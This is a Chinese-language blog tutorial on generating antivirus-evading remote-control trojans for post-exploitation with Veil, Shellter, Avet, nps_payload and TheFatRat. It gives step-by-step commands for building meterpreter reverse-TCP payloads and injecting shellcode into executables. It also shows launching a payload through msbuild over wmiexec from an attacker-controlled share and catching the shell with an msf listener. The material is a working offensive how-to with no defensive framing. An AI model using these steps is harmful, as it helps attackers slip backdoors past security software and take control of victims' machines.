几款远控免杀工具使用总结

前言

后渗透过程中往往要使用msf和cs等工具的木马,而默认生成的木马非常容易被杀毒软件检出,这个时候就需要对木马进行免杀,本文介绍几款免杀工具的使用。

虽然经过杀毒软件多年更新,这些工具免杀效果可能已经很一般了,但是相比于自己写编码器解码器来做免杀更为方便简单,没有任何编程积累也可以直接使用。

veil

下载安装

docker安装veil

1
docker pull mattiasohlsson/veil

映射路径并运行

1
docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil

介绍

list命令可查看其两个免杀工具,Evasion和Ordnance

  • Evasion可用于文件免杀
  • Ordnance可生成shellcode

生成msf免杀payload

1
2
进入Evasion
use 1

1
2
查看可用的payloads
list payloads

1
2
选择要使用的payloads,如选择ruby的meterpreter/rev_tcp
use 39
1
2
3
设置监听ip和端口
set lhost xx.xx.xx.xx
set lport 4444

1
2
3
4
5
6
7
8
9
生成可执行文件并取名test
generate
test
由于刚才配置了映射路径,可执行文件被生成在本机的/tmp/veil-output/compiled路径下,对应的msf的配置文件被生成在/tmp/veil-output/handlers路径下

在本地使用msf配置文件开启msf监听
msfconsole -r test.rc

将test.exe传入目标机器,并运行,反弹回shell

使用自定义payload生成免杀木马

使用cs的payload为例

首先在cs的界面,攻击-生成后门-payload generator-veil,保存为payload.txt

开启veil,之前步骤同上

1
2
选择13号payload
generate

在generate之后的选项中选择3号,自定义payload,然后粘贴payload.txt内容,确认生成

shellter

下载安装

下载windows版

https://www.shellterproject.com/download/

使用shellter注入shellcode

寻找或自行编译一个32位pe程序作为载体

打开shellter

设置注入目标pe程序

选择本地payload或自定义payload

1
2
L为本地
输入1选择常规的Meterpreter_Reverse_TCP

设置lhost和lport

成功生成免杀恶意程序

Avet

下载安装

1
2
3
git clone https://github.com/govolution/avet
cd avet
./setup.sh

使用Avet生成免杀文件

启动

1
python ./avet.py

选择要使用的payload编号

设置监听ip端口以及其他配置

生成免杀可执行文件

nps_payload

下载安装

1
2
3
git clone  https://github.com/trustedsec/nps_payload
cd nps_payload/
pip install -r requirements.txt

生成

1
2
3
4
5
6
7
8
9
python nps_payload.py

选择1生成msf类型payload

选择payload类型

设置IP和端口

生成

执行

1
2
3
4
5
6
1. 本地加载执行:
- %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml

2. 远程文件执行:

wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml

msf监听

1
msfconsole -r msbuild_nps.rc

TheFatRat

下载安装

1
2
3
4
git clone https://github.com/Screetsec/TheFatRat
cd TheFatRat
chmod +x setup.sh
./setup.sh

运行

1
fatrat

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!